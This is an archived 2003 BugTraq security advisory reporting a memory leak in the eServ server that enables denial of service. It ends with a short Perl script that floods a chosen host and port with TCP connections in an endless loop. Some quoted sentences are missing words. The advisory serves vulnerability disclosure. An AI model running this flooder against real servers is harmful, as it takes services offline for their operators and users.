Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Unix :: General :: bt1445.txt

eServ Memory Leak Enables Denial of Service Attacks

----- Original Message -----
From: "Matthew Murphy" <>
To: "BugTraq" <>
Sent: Sunday, May 11, 2003 8:21 AM
Subject: eServ Memory Leak Enables Denial of Service Attacks

> eServ Memory Leak Enables Denial of Service Attacks
> I. Product Description
> eServ is a hybrid Web server (HTTP), FTP server, mail server (POP3, SMTP,
> Finger), news server (NNTP), and proxy server.  It provides all these
> services in a single package, so that administrators are not required to
> multiple different packages to support these protocols.
> II. Vulnerability Description
> eServ's connection handling routine contains a memory leak that may be
> exploited to cause the eServ daemon to become unavailable.  Upon receiving
> connection, the server allocates a block of memory on the heap between 8
> 32 kilobytes in size.  The reason for this size variance was not isolated.
> This block of memory is not freed on disconnect, leading it to leak.
> several thousand successful connections, memory use on the system becomes
> exceedingly high.  If memory use on the system becomes excessively high,
> system may become unusable.
> III. Impact
> An attacker who can repeatedly establish connections with the eServ daemon
> can cause services running on the vulnerable system (including other
> services outside of eServ's process) to fail.  The vulnerability can
> actually be exploited by accident on high-traffic sites -- each connection
> causes a leak.  After about 1,000 connections, anywhere between 7.81 MB
> 31.25 MB may leak.
> To deprive an average server system of resources to the point of failure,
> significant number of connections is required.  After 10,000 connections,
> 78.1 MB to 312.5 MB may leak; in my experience, about 50,000 connections
> sufficient to cause system failure.  At this point, 390.5 MB to 1.52 GB
> leaked.
> IV. Vendor Contact
> I attempted to contact the vendor via and
> The former address bounced, and no response was received from the second
> contact attempt.  eServ has a horrible security record, and I recommend
> using a production server for internet sites.
> V. Exploit
> #!/usr/bin/perl
> #LEGAL NOTICE: Don't test this on networks you don't administer,
> #and do not test this tool on networks you don't own without
> #permission of the network owner.  You are responsible for all
> #damage due to your use of this tool.
> use IO::Socket;
> print "$0: eServ Remote DoS Exploit\r\n";
> print "By Matthew Murphy \<mattmurphy\\>\r\n\r\n";
> print "Server hostname\: ";
> $host = trim(chomp($line = <STDIN>));
> print "Service port to probe\: ";
> $port = trim(chomp($line = <STDIN>));
> print "\r\nBeginning probe -- stop with CTRL+C\r\n";
> while (1) {
>  $f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host:$port");
>  undef $f;
> }

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH